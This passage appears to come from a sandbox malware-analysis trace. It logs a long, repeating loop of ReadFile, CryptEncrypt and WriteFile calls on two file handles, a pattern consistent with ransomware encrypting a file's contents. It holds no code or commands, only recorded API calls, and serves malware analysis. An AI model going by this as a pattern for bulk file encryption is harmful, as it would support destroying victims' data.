| out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.838] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.838] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.838] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.838] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.838] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.838] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.839] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.839] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.839] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.839] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.839] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.839] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.839] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.839] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.839] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.839] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.839] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.839] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.839] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.839] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.839] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.840] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.840] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.840] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.840] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.840] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.840] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.840] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.840] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.840] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.840] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.840] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.840] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.840] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.840] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.840] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.841] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.841] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.841] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.841] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.841] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.841] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.841] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.841] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.841] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.841] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.841] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.841] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.841] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.841] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.841] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.842] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.842] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.842] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.842] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.842] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.842] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.842] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.842] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.842] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.842] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.842] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.842] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.843] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.843] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.843] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.843] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.843] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.843] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.843] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.843] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.843] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.844] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.844] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.844] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.844] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.844] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.844] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.844] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.844] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.844] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.844] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.844] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.844] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.844] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.844] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.844] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.845] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.845] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.845] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.845] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.845] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.845] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.845] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.845] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.845] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.845] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.845] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.845] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.845] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.845] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.846] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.846] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 